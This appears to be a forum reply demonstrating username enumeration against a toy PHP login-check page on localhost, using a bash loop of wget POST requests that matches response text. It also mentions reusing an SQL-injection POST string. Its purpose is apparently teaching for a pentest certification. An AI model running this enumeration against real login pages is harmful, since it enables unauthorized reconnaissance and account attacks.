The following PHP script is a simplified version of the page I believe you're trying to access. It compares the POST user variable to a list of user names (users.db) and returns whether or not the POST user is a valid user. The type of back-end really isn't relevant. You ultimately just need to iterate through a list of users and identify a unique string that signifies a valid user in the page that's returned.
(Edit: You'll get a PHP Notice / blank page if you don't supply user via POST; I obviously didn't include any error checking.)
index.php:
<?php
$user = $_POST['user'];
$f = fopen('users.db', 'r');
$message = 'Invalid User';
while ($line = trim(fgets($f))) {
if ($line == $user) {
$message = 'Valid User';
break;
}
}
echo $message . "\n";
?>
users.db:
steve
anthony
bob
I was originally going to write an example in Python, but I knew sil would respond with, "You can do that with bash..." so I decided to skip a step
The following is the users.lst file that is iterated through and tested for validity.
bob
sally
alice
nicky
steve
bill
anthony
drew
This script iterates through the user list, acquires the page with wget, checks for the unique validity string, and writes out if a match is found.
for u in `cat users.lst`; do wget --post-data="user=$u" -q -O - http://localhost/ehtest/index.php | grep -i -q ^valid && echo $u found; done
bob found
steve found
anthony found
If you have the SQLi POST string, all you have to do is replace the username/email/whatever and perform text-matching like I did above. If you want to do this with Python and make it sexier, you can start by researching the urllib library.
General Certification : CPT Practical Submission
